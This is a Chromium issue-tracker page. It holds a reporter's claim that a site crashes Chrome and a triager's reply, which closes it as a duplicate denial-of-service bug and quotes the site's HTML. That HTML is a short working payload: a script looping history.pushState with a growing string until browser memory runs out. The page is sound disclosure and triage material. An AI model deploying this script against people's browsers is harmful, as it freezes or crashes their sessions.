New issue
Advanced search Search tips

Issue 738470 link

Starred by 1 user

Issue metadata

Status: Duplicate
Merged: issue 394296
Owner: ----
Closed: Jun 2017
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: Site causes Denial of Service in Chrome

Reported by vishnupr...@gmail.com, Jun 30 2017

Issue description

When we visit http://crashchrome.com/ , it  redirects too many times automatically, also dump too many integer values.
It fills memory and stops the  browser working.
its a type of buffer overflow.
 
Components: UI>Browser>Navigation
Mergedinto: 394296
Status: Duplicate (was: Unconfirmed)
Summary: Security: Site causes Denial of Service in Chrome (was: Security: Buffer Overflow)
This is a trivial exploit site for  Issue 394296 . It's a denial-of-service, not a "buffer overflow".

<!DOCTYPE html>
<html>
  <body>
      <h1>What were you expecting?</h1>
      <script>
      var total = "";
      for( var i = 0; i < 100000; i++ ) {
          total = total + i.toString();
          history.pushState(0,0, total );
      }
  </script>
  </body>
</html>
How we can able to prevent it...??
Project Member

Comment 3 by sheriffbot@chromium.org, Nov 30 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment